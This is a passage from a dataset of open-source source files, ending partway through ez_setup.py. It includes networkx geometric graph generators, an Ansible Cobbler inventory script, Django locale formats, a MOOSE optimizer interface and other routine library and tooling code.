repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
AyoubZahid/odoo | refs/heads/9.0 | addons/website_sale_stock/controllers/__init__.py | 7372 | import main
|
liangazhou/django-rdp | refs/heads/master | packages/Django-1.8.6/build/lib/django/conf/locale/kn/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'h:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
bgris/ODL_bgris | refs/heads/master | lib/python3.5/site-packages/skimage/measure/__init__.py | 8 | from ._find_contours import find_contours
from ._marching_cubes import (marching_cubes, mesh_surface_area,
correct_mesh_orientation)
from ._regionprops import regionprops, perimeter
from .simple_metrics import compare_mse, compare_nrmse, compare_psnr
from ._structural_similarity import compare_ssim, structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from ._pnpoly import points_in_poly, grid_points_in_poly
from ._moments import moments, moments_central, moments_normalized, moments_hu
from .profile import profile_line
from .fit import LineModel, LineModelND, CircleModel, EllipseModel, ransac
from .block import block_reduce
from ._label import label
__all__ = ['find_contours',
'regionprops',
'perimeter',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'LineModelND',
'CircleModel',
'EllipseModel',
'ransac',
'block_reduce',
'moments',
'moments_central',
'moments_normalized',
'moments_hu',
'marching_cubes',
'mesh_surface_area',
'correct_mesh_orientation',
'profile_line',
'label',
'points_in_poly',
'grid_points_in_poly',
'structural_similarity',
'compare_ssim',
'compare_mse',
'compare_nrmse',
'compare_psnr',
]
|
cogeorg/BlackRhino | refs/heads/master | examples/firesales_simple/networkx/generators/geometric.py | 30 | # -*- coding: utf-8 -*-
"""
Generators for geometric graphs.
"""
# Copyright (C) 2004-2011 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from __future__ import print_function
__author__ = "\n".join(['Aric Hagberg (hagberg@lanl.gov)',
'Dan Schult (dschult@colgate.edu)',
'Ben Edwards (BJEdwards@gmail.com)'])
__all__ = ['random_geometric_graph',
'waxman_graph',
'geographical_threshold_graph',
'navigable_small_world_graph']
from bisect import bisect_left
from functools import reduce
from itertools import product
import math, random, sys
import networkx as nx
#---------------------------------------------------------------------------
# Random Geometric Graphs
#---------------------------------------------------------------------------
def random_geometric_graph(n, radius, dim=2, pos=None):
r"""Return the random geometric graph in the unit cube.
The random geometric graph model places n nodes uniformly at random
in the unit cube Two nodes `u,v` are connected with an edge if
`d(u,v)<=r` where `d` is the Euclidean distance and `r` is a radius
threshold.
Parameters
----------
n : int
Number of nodes
radius: float
Distance threshold value
dim : int, optional
Dimension of graph
pos : dict, optional
A dictionary keyed by node with node positions as values.
Returns
-------
Graph
Examples
--------
>>> G = nx.random_geometric_graph(20,0.1)
Notes
-----
This uses an `n^2` algorithm to build the graph. A faster algorithm
is possible using k-d trees.
The pos keyword can be used to specify node positions so you can create
an arbitrary distribution and domain for positions. If you need a distance
function other than Euclidean you'll have to hack the algorithm.
E.g to use a 2d Gaussian distribution of node positions with mean (0,0)
and std. dev. 2
>>> import random
>>> n=20
>>> p=dict((i,(random.gauss(0,2),random.gauss(0,2))) for i in range(n))
>>> G = nx.random_geometric_graph(n,0.2,pos=p)
References
----------
.. [1] Penrose, Mathew, Random Geometric Graphs,
Oxford Studies in Probability, 5, 2003.
"""
G=nx.Graph()
G.name="Random Geometric Graph"
G.add_nodes_from(range(n))
if pos is None:
# random positions
for n in G:
G.node[n]['pos']=[random.random() for i in range(0,dim)]
else:
nx.set_node_attributes(G,'pos',pos)
# connect nodes within "radius" of each other
# n^2 algorithm, could use a k-d tree implementation
nodes = G.nodes(data=True)
while nodes:
u,du = nodes.pop()
pu = du['pos']
for v,dv in nodes:
pv = dv['pos']
d = sum(((a-b)**2 for a,b in zip(pu,pv)))
if d <= radius**2:
G.add_edge(u,v)
return G
def geographical_threshold_graph(n, theta, alpha=2, dim=2,
pos=None, weight=None):
r"""Return a geographical threshold graph.
The geographical threshold graph model places n nodes uniformly at random
in a rectangular domain. Each node `u` is assigned a weight `w_u`.
Two nodes `u,v` are connected with an edge if
.. math::
w_u + w_v \ge \theta r^{\alpha}
where `r` is the Euclidean distance between `u` and `v`,
and `\theta`, `\alpha` are parameters.
Parameters
----------
n : int
Number of nodes
theta: float
Threshold value
alpha: float, optional
Exponent of distance function
dim : int, optional
Dimension of graph
pos : dict
Node positions as a dictionary of tuples keyed by node.
weight : dict
Node weights as a dictionary of numbers keyed by node.
Returns
-------
Graph
Examples
--------
>>> G = nx.geographical_threshold_graph(20,50)
Notes
-----
If weights are not specified they are assigned to nodes by drawing randomly
from an the exponential distribution with rate parameter `\lambda=1`.
To specify a weights from a different distribution assign them to a
dictionary and pass it as the weight= keyword
>>> import random
>>> n = 20
>>> w=dict((i,random.expovariate(5.0)) for i in range(n))
>>> G = nx.geographical_threshold_graph(20,50,weight=w)
If node positions are not specified they are randomly assigned from the
uniform distribution.
References
----------
.. [1] Masuda, N., Miwa, H., Konno, N.:
Geographical threshold graphs with small-world and scale-free properties.
Physical Review E 71, 036108 (2005)
.. [2] Milan Bradonjić, Aric Hagberg and Allon G. Percus,
Giant component and connectivity in geographical threshold graphs,
in Algorithms and Models for the Web-Graph (WAW 2007),
Antony Bonato and Fan Chung (Eds), pp. 209--216, 2007
"""
G=nx.Graph()
# add n nodes
G.add_nodes_from([v for v in range(n)])
if weight is None:
# choose weights from exponential distribution
for n in G:
G.node[n]['weight'] = random.expovariate(1.0)
else:
nx.set_node_attributes(G,'weight',weight)
if pos is None:
# random positions
for n in G:
G.node[n]['pos']=[random.random() for i in range(0,dim)]
else:
nx.set_node_attributes(G,'pos',pos)
G.add_edges_from(geographical_threshold_edges(G, theta, alpha))
return G
def geographical_threshold_edges(G, theta, alpha=2):
# generate edges for a geographical threshold graph given a graph
# with positions and weights assigned as node attributes 'pos' and 'weight'.
nodes = G.nodes(data=True)
while nodes:
u,du = nodes.pop()
wu = du['weight']
pu = du['pos']
for v,dv in nodes:
wv = dv['weight']
pv = dv['pos']
r = math.sqrt(sum(((a-b)**2 for a,b in zip(pu,pv))))
if wu+wv >= theta*r**alpha:
yield(u,v)
def waxman_graph(n, alpha=0.4, beta=0.1, L=None, domain=(0,0,1,1)):
r"""Return a Waxman random graph.
The Waxman random graph models place n nodes uniformly at random
in a rectangular domain. Two nodes u,v are connected with an edge
with probability
.. math::
p = \alpha*exp(-d/(\beta*L)).
This function implements both Waxman models.
Waxman-1: `L` not specified
The distance `d` is the Euclidean distance between the nodes u and v.
`L` is the maximum distance between all nodes in the graph.
Waxman-2: `L` specified
The distance `d` is chosen randomly in `[0,L]`.
Parameters
----------
n : int
Number of nodes
alpha: float
Model parameter
beta: float
Model parameter
L : float, optional
Maximum distance between nodes. If not specified the actual distance
is calculated.
domain : tuple of numbers, optional
Domain size (xmin, ymin, xmax, ymax)
Returns
-------
G: Graph
References
----------
.. [1] B. M. Waxman, Routing of multipoint connections.
IEEE J. Select. Areas Commun. 6(9),(1988) 1617-1622.
"""
# build graph of n nodes with random positions in the unit square
G = nx.Graph()
G.add_nodes_from(range(n))
(xmin,ymin,xmax,ymax)=domain
for n in G:
G.node[n]['pos']=((xmin + (xmax-xmin))*random.random(),
(ymin + (ymax-ymin))*random.random())
if L is None:
# find maximum distance L between two nodes
l = 0
pos = list(nx.get_node_attributes(G,'pos').values())
while pos:
x1,y1 = pos.pop()
for x2,y2 in pos:
r2 = (x1-x2)**2 + (y1-y2)**2
if r2 > l:
l = r2
l=math.sqrt(l)
else:
# user specified maximum distance
l = L
nodes=G.nodes()
if L is None:
# Waxman-1 model
# try all pairs, connect randomly based on euclidean distance
while nodes:
u = nodes.pop()
x1,y1 = G.node[u]['pos']
for v in nodes:
x2,y2 = G.node[v]['pos']
r = math.sqrt((x1-x2)**2 + (y1-y2)**2)
if random.random() < alpha*math.exp(-r/(beta*l)):
G.add_edge(u,v)
else:
# Waxman-2 model
# try all pairs, connect randomly based on randomly chosen l
while nodes:
u = nodes.pop()
for v in nodes:
r = random.random()*l
if random.random() < alpha*math.exp(-r/(beta*l)):
G.add_edge(u,v)
return G
def navigable_small_world_graph(n, p=1, q=1, r=2, dim=2, seed=None):
r"""Return a navigable small-world graph.
A navigable small-world graph is a directed grid with additional
long-range connections that are chosen randomly. From [1]_:
Begin with a set of nodes that are identified with the set of lattice
points in an `n \times n` square, `{(i,j): i\in {1,2,\ldots,n}, j\in {1,2,\ldots,n}}`
and define the lattice distance between two nodes `(i,j)` and `(k,l)`
to be the number of "lattice steps" separating them: `d((i,j),(k,l)) = |k-i|+|l-j|`.
For a universal constant `p`, the node `u` has a directed edge to every other
node within lattice distance `p` (local contacts) .
For universal constants `q\ge 0` and `r\ge 0` construct directed edges from `u` to `q`
other nodes (long-range contacts) using independent random trials; the i'th
directed edge from `u` has endpoint `v` with probability proportional to `d(u,v)^{-r}`.
Parameters
----------
n : int
The number of nodes.
p : int
The diameter of short range connections. Each node is connected
to every other node within lattice distance p.
q : int
The number of long-range connections for each node.
r : float
Exponent for decaying probability of connections. The probability of
connecting to a node at lattice distance d is 1/d^r.
dim : int
Dimension of grid
seed : int, optional
Seed for random number generator (default=None).
References
----------
.. [1] J. Kleinberg. The small-world phenomenon: An algorithmic
perspective. Proc. 32nd ACM Symposium on Theory of Computing, 2000.
"""
if (p < 1):
raise nx.NetworkXException("p must be >= 1")
if (q < 0):
raise nx.NetworkXException("q must be >= 0")
if (r < 0):
raise nx.NetworkXException("r must be >= 1")
if not seed is None:
random.seed(seed)
G = nx.DiGraph()
nodes = list(product(range(n),repeat=dim))
for p1 in nodes:
probs = [0]
for p2 in nodes:
if p1==p2:
continue
d = sum((abs(b-a) for a,b in zip(p1,p2)))
if d <= p:
G.add_edge(p1,p2)
probs.append(d**-r)
cdf = list(nx.utils.cumulative_sum(probs))
for _ in range(q):
target = nodes[bisect_left(cdf,random.uniform(0, cdf[-1]))]
G.add_edge(p1,target)
return G
|
sx-ruan/BEESEM | refs/heads/master | toolbox/basic.py | 2 | # coding: utf-8
import itertools as itt
import numpy as np
def Col(array):
"""
:param array: array_like
:return: ndarray
>>> Col([0, 1])
array([[0],
[1]])
"""
return np.reshape(array, (-1, 1))
def Flip(dictionary):
"""
:param dictionary: dict
:return: dict
>>> Flip({1: 2})
{2: 1}
"""
return dict((v, k) for k, v in dictionary.iteritems())
def Product(string, repeat):
"""
:param string: str
:param repeat: int
:return: list[str]
>>> Product('ab', 2)
['aa', 'ab', 'ba', 'bb']
"""
return [''.join(x) for x in itt.product(string, repeat=repeat)]
def Subset(array, length):
"""
:param array: array_like
:param length: int
:return: list
>>> Subset('abcd', 3)
['abc', 'bcd']
>>> Subset([1, 2], 3)
Traceback (most recent call last):
...
AssertionError
"""
n = len(array) - length + 1
assert n > 0
return [array[i : i+length] for i in range(n)]
def Outer(*iterables):
"""
:param iterables: list[iterable]
:return: list[Number]
>>> Outer([1, 2], [3, 4])
[3, 4, 6, 8]
"""
return [np.prod(x) for x in itt.product(*iterables)]
def Id(x):
"""
:param x: object
:return: object
"""
return x
def Group(iterable, size=1):
"""
:param iterable: iterable
:param size: int
:return: iterator
>>> list(Group([1, 2]))
[(1,), (2,)]
>>> list(Group([1, 2], 2))
[(1, 2)]
"""
iters = [iter(iterable)] * size
return itt.izip(*iters)
def In(x, y):
"""
:param x: array_like
:param y: array_like
:return: bool
>>> In(1, [2, 3])
False
>>> In(1, 1)
True
"""
return x in np.array(y)
def KL(x, y):
"""
Calculate the Kullback-Leibler divergence.
:param x: iterable
:param y: iterable
:return: float
>>> KL([1, 2], [-3, 4])
Traceback (most recent call last):
...
AssertionError
"""
p = np.fromiter(x, float)
q = np.fromiter(y, float)
assert min(p) > 0 and min(q) > 0
p /= sum(p)
q /= sum(q)
return np.log(p / q).dot(p)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
saurabh6790/omnitech-app | refs/heads/master | patches/october_2013/p07_rename_for_territory.py | 30 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes, os
def execute():
from webnotes.utils import get_base_path
import shutil
webnotes.reload_doc("core", "doctype", "doctype")
tables = webnotes.conn.sql_list("show tables")
if "tabApplicable Territory" not in tables:
webnotes.rename_doc("DocType", "For Territory", "Applicable Territory", force=True)
webnotes.reload_doc("setup", "doctype", "applicable_territory")
path = os.path.join(get_base_path(), "app", "setup", "doctype", "for_territory")
if os.path.exists(path):
shutil.rmtree(path)
if webnotes.conn.exists("DocType", "For Territory"):
webnotes.delete_doc("DocType", "For Territory")
|
rosmo/ansible | refs/heads/devel | contrib/inventory/cobbler.py | 32 | #!/usr/bin/env python
"""
Cobbler external inventory script
=================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this, copy this file over /etc/ansible/hosts and chmod +x the file.
This, more or less, allows you to keep one central database containing
info about all of your managed instances.
This script is an example of sourcing that data from Cobbler
(https://cobbler.github.io). With cobbler each --mgmt-class in cobbler
will correspond to a group in Ansible, and --ks-meta variables will be
passed down for use in templates or even in argument lines.
NOTE: The cobbler system names will not be used. Make sure a
cobbler --dns-name is set for each cobbler system. If a system
appears with two DNS names we do not add it twice because we don't want
ansible talking to it twice. The first one found will be used. If no
--dns-name is set the system will NOT be visible to ansible. We do
not add cobbler system names because there is no requirement in cobbler
that those correspond to addresses.
Tested with Cobbler 2.0.11.
Changelog:
- 2015-06-21 dmccue: Modified to support run-once _meta retrieval, results in
higher performance at ansible startup. Groups are determined by owner rather than
default mgmt_classes. DNS name determined from hostname. cobbler values are written
to a 'cobbler' fact namespace
- 2013-09-01 pgehres: Refactored implementation to make use of caching and to
limit the number of connections to external cobbler server for performance.
Added use of cobbler.ini file to configure settings. Tested with Cobbler 2.4.0
"""
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
######################################################################
import argparse
import os
import re
from time import time
import xmlrpclib
import json
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import configparser as ConfigParser
# NOTE -- this file assumes Ansible is being accessed FROM the cobbler
# server, so it does not attempt to login with a username and password.
# this will be addressed in a future version of this script.
orderby_keyname = 'owners' # alternatively 'mgmt_classes'
class CobblerInventory(object):
def __init__(self):
""" Main execution path """
self.conn = None
self.inventory = dict() # A list of groups and the hosts in that group
self.cache = dict() # Details about hosts in the inventory
self.ignore_settings = False # used to only look at env vars for settings.
# Read env vars, read settings, and parse CLI arguments
self.parse_env_vars()
self.read_settings()
self.parse_cli_args()
# Cache
if self.args.refresh_cache:
self.update_cache()
elif not self.is_cache_valid():
self.update_cache()
else:
self.load_inventory_from_cache()
self.load_cache_from_cache()
data_to_print = ""
# Data to print
if self.args.host:
data_to_print += self.get_host_info()
else:
self.inventory['_meta'] = {'hostvars': {}}
for hostname in self.cache:
self.inventory['_meta']['hostvars'][hostname] = {'cobbler': self.cache[hostname]}
data_to_print += self.json_format_dict(self.inventory, True)
print(data_to_print)
def _connect(self):
if not self.conn:
self.conn = xmlrpclib.Server(self.cobbler_host, allow_none=True)
self.token = None
if self.cobbler_username is not None:
self.token = self.conn.login(self.cobbler_username, self.cobbler_password)
def is_cache_valid(self):
""" Determines if the cache files have expired, or if it is still valid """
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
if os.path.isfile(self.cache_path_inventory):
return True
return False
def read_settings(self):
""" Reads the settings from the cobbler.ini file """
if(self.ignore_settings):
return
config = ConfigParser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/cobbler.ini')
self.cobbler_host = config.get('cobbler', 'host')
self.cobbler_username = None
self.cobbler_password = None
if config.has_option('cobbler', 'username'):
self.cobbler_username = config.get('cobbler', 'username')
if config.has_option('cobbler', 'password'):
self.cobbler_password = config.get('cobbler', 'password')
# Cache related
cache_path = config.get('cobbler', 'cache_path')
self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
self.cache_max_age = config.getint('cobbler', 'cache_max_age')
def parse_env_vars(self):
""" Reads the settings from the environment """
# Env. Vars:
# COBBLER_host
# COBBLER_username
# COBBLER_password
# COBBLER_cache_path
# COBBLER_cache_max_age
# COBBLER_ignore_settings
self.cobbler_host = os.getenv('COBBLER_host', None)
self.cobbler_username = os.getenv('COBBLER_username', None)
self.cobbler_password = os.getenv('COBBLER_password', None)
# Cache related
cache_path = os.getenv('COBBLER_cache_path', None)
if(cache_path is not None):
self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
self.cache_max_age = int(os.getenv('COBBLER_cache_max_age', "30"))
# ignore_settings is used to ignore the settings file, for use in Ansible
# Tower (or AWX inventory scripts and not throw python exceptions.)
if(os.getenv('COBBLER_ignore_settings', False) == "True"):
self.ignore_settings = True
def parse_cli_args(self):
""" Command line argument processing """
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Cobbler')
parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests to cobbler (default: False - use cache files)')
self.args = parser.parse_args()
def update_cache(self):
""" Make calls to cobbler and save the output in a cache """
self._connect()
self.groups = dict()
self.hosts = dict()
if self.token is not None:
data = self.conn.get_systems(self.token)
else:
data = self.conn.get_systems()
for host in data:
# Get the FQDN for the host and add it to the right groups
dns_name = host['hostname'] # None
ksmeta = None
interfaces = host['interfaces']
# hostname is often empty for non-static IP hosts
if dns_name == '':
for (iname, ivalue) in iteritems(interfaces):
if ivalue['management'] or not ivalue['static']:
this_dns_name = ivalue.get('dns_name', None)
if this_dns_name is not None and this_dns_name is not "":
dns_name = this_dns_name
if dns_name == '' or dns_name is None:
continue
status = host['status']
profile = host['profile']
classes = host[orderby_keyname]
if status not in self.inventory:
self.inventory[status] = []
self.inventory[status].append(dns_name)
if profile not in self.inventory:
self.inventory[profile] = []
self.inventory[profile].append(dns_name)
for cls in classes:
if cls not in self.inventory:
self.inventory[cls] = []
self.inventory[cls].append(dns_name)
# Since we already have all of the data for the host, update the host details as well
# The old way was ksmeta only -- provide backwards compatibility
self.cache[dns_name] = host
if "ks_meta" in host:
for key, value in iteritems(host["ks_meta"]):
self.cache[dns_name][key] = value
self.write_to_cache(self.cache, self.cache_path_cache)
self.write_to_cache(self.inventory, self.cache_path_inventory)
def get_host_info(self):
""" Get variables about a specific host """
if not self.cache or len(self.cache) == 0:
# Need to load index from cache
self.load_cache_from_cache()
if self.args.host not in self.cache:
# try updating the cache
self.update_cache()
if self.args.host not in self.cache:
# host might not exist anymore
return self.json_format_dict({}, True)
return self.json_format_dict(self.cache[self.args.host], True)
def push(self, my_dict, key, element):
""" Pushed an element onto an array that may not have been defined in the dict """
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def load_inventory_from_cache(self):
""" Reads the index from the cache file sets self.index """
cache = open(self.cache_path_inventory, 'r')
json_inventory = cache.read()
self.inventory = json.loads(json_inventory)
def load_cache_from_cache(self):
""" Reads the cache from the cache file sets self.cache """
cache = open(self.cache_path_cache, 'r')
json_cache = cache.read()
self.cache = json.loads(json_cache)
def write_to_cache(self, data, filename):
""" Writes data in JSON format to a file """
json_data = self.json_format_dict(data, True)
cache = open(filename, 'w')
cache.write(json_data)
cache.close()
def to_safe(self, word):
""" Converts 'bad' characters in a string to underscores so they can be used as Ansible groups """
return re.sub(r"[^A-Za-z0-9\-]", "_", word)
def json_format_dict(self, data, pretty=False):
""" Converts a dict to a JSON object and dumps it as a formatted string """
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
CobblerInventory()
|
rahulgayatri23/moose-core | refs/heads/master | python/moose/optimizer_interface.py | 4 | # optimizer_interface.py ---
#
# Filename: optimizer_interface.py
# Description: Provides an interface between Optimizer and MOOSE
# Author: Viktor Toth
# Maintainer:
# Copyright (C) 2014 Viktor Toth, all rights reserved.
# Created: 7 Aug 14:45:30 2014 (+0530)
# Version: 1.0
# Last-Updated:
# URL:
# Keywords:
# Compatibility:
#
#
# Code:
import os
from . import moose
class OptimizerInterface:
"""
Establish connection between MOOSE and Optimzer, parameter fitting tool.
Usage: create an OptimizerInterface object at the beginning of the
script running the MOOSE simulation. Call getParams() to retrieve
the parameters advised by Optimizer, then run the simulation using
these parameters. When the simulation has already run, call addTrace()
passing every trace as a moose.Table or list of floats. When all the
traces are added, call writeTraces() so when your script finished
Optimizer is able to read these traces from traceFile.
On the second 'layer' of the Optimizer GUI select external
(as type of simulator) and type into the command text box:
'python /path_to_your_model_script/script.py 3' if the number of
parameters to fit is 3.
"""
paramFile = 'params.param' # contains parameters, separated by newline
traceFile = 'trace.dat' # contains traces, TAB separated in columns
params = []
traces = []
def __init__(self, paramFile = paramFile, traceFile = traceFile):
"""
Opens or create paramFile and traceFile. Reads the parameters
from paramFile if able to.
"""
self.paramFile = paramFile
self.traceFile = traceFile
# parameter file
if os.path.isfile(self.paramFile):
with open(self.paramFile) as f:
self.params = [float(line) for line in f]
else:
open(self.paramFile, 'a').close() # create file
# trace file
if not os.path.isfile(self.traceFile):
open(self.traceFile, 'a').close() # create file
def addTrace(self, trace):
"""
A trace can be a moose.Table object or a list of float numbers.
"""
if isinstance(trace, moose.Table):
self.traces.append(trace.vec)
else:
self.traces.append(trace)
def writeTraces(self):
"""
Writes the content of traces to traceFile. Every column is a
trace separated by TABs.
"""
# TODO implement interpolation if trace is not the same length - not really needed
# all traces should have the same length (same sampling freq)
assert len(self.traces) > 0 and len(self.traces[0]) > 0, 'No traces or empty trace found!'
for i in range(1, len(self.traces)):
assert len(self.traces[i - 1]) == len(self.traces[i]), 'All traces should have the same length! Use identical sampling frequency!'
with open(self.traceFile, 'w') as f:
for i in range(len(self.traces[0])):
row = [str(trace[i]) for trace in self.traces]
f.write('\t'.join(row) + '\n')
def getParams(self):
"""
Returns the list of parameters read from paramFile.
"""
return self.params
|
endlessm/chromium-browser | refs/heads/master | third_party/webgl/src/sdk/tests/deqp/functional/gles3/primitiverestart/primitiverestart_test_generator.py | 6 | #!/usr/bin/env python
# Copyright (c) 2019 The Khronos Group Inc.
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE.txt file.
"""
Generator for primitiverestart* tests.
This file needs to be run in its folder.
"""
import sys
_DO_NOT_EDIT_WARNING = """<!--
This file is auto-generated from primitiverestart_test_generator.py
DO NOT EDIT!
-->
"""
_HTML_TEMPLATE = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>WebGL Primitive Restart Conformance Tests</title>
<link rel="stylesheet" href="../../../../resources/js-test-style.css"/>
<script src="../../../../js/js-test-pre.js"></script>
<script src="../../../../js/webgl-test-utils.js"></script>
<script src="../../../../closure-library/closure/goog/base.js"></script>
<script src="../../../deqp-deps.js"></script>
<script>goog.require('functional.gles3.es3fPrimitiveRestartTests');</script>
</head>
<body>
<div id="description"></div>
<div id="console"></div>
<canvas id="canvas" width="256" height="256"> </canvas>
<script>
var wtu = WebGLTestUtils;
var gl = wtu.create3DContext('canvas', null, 2);
functional.gles3.es3fPrimitiveRestartTests.run(gl, [%(start)s, %(end)s]);
</script>
</body>
</html>
"""
_NUM_TESTS = 8
def WriteTest(filename, start, end):
"""Write one test."""
file = open(filename, "wb")
file.write(_DO_NOT_EDIT_WARNING)
file.write(_HTML_TEMPLATE % {
'start': start,
'end': end
})
file.close
def GenerateTests():
"""Generate all tests."""
filelist = []
for ii in range(_NUM_TESTS):
index_str = str(ii)
if ii < 10:
index_str = "0" + index_str
filename = index_str + '.html'
filelist.append(filename)
WriteTest(filename, ii, ii + 1)
return filelist
def GenerateTestList(filelist):
file = open("00_test_list.txt", "wb")
file.write('\n'.join(filelist))
file.close
def main(argv):
"""This is the main function."""
filelist = GenerateTests()
GenerateTestList(filelist)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
anasazi/POP-REU-Project | refs/heads/master | pkgs/tools/yasm/src/tools/python-yasm/tests/test_bytecode.py | 5 | # $Id: test_bytecode.py 1740 2007-01-21 22:01:34Z peter $
from tests import TestCase, add
from yasm import Bytecode, Expression
|
eduNEXT/edunext-platform | refs/heads/master | openedx/core/djangoapps/dark_lang/admin.py | 9 | """
Admin site bindings for dark_lang
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
admin.site.register(DarkLangConfig, ConfigurationModelAdmin)
|
lucychambers/lucychambers.github.io | refs/heads/master | .bundle/ruby/2.0.0/gems/pygments.rb-0.6.0/vendor/pygments-main/ez_setup.py | 165 | #!python
"""Bootstrap setuptools installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import tarfile
import optparse
import subprocess
import platform
from distutils import log
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "1.4.2"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
def _python_cmd(*args):
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _check_call_py24(cmd, *args, **kwargs):
res = subprocess.call(cmd, *args, **kwargs)
class CalledProcessError(Exception):
pass
if not res == 0:
msg = "Command '%s' return non-zero exit status %d" % (cmd, res)
raise CalledProcessError(msg)
vars(subprocess).setdefault('check_call', _check_call_py24)
def _install(tarball, install_args=()):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# installing
log.warn('Installing Setuptools')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
def _build_egg(egg, tarball, to_dir):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# building an egg
log.warn('Building a Setuptools egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
tarball = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, tarball, to_dir)
sys.path.insert(0, egg)
# Remove previously-imported pkg_resources if present (see
# https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
if 'pkg_resources' in sys.modules:
del sys.modules['pkg_resources']
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, download_delay=15):
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
was_imported = 'pkg_resources' in sys.modules or \
'setuptools' in sys.modules
try:
import pkg_resources
except ImportError:
return _do_download(version, download_base, to_dir, download_delay)
try:
pkg_resources.require("setuptools>=" + version)
return
except pkg_resources.VersionConflict:
e = sys.exc_info()[1]
if was_imported:
sys.stderr.write(
"The required version of setuptools (>=%s) is not available,\n"
"and can't be installed while this script is running. Please\n"
"install a more recent version first, using\n"
"'easy_install -U setuptools'."
"\n\n(Currently using %r)\n" % (version, e.args[0]))
sys.exit(2)
else:
del pkg_resources, sys.modules['pkg_resources'] # reload ok
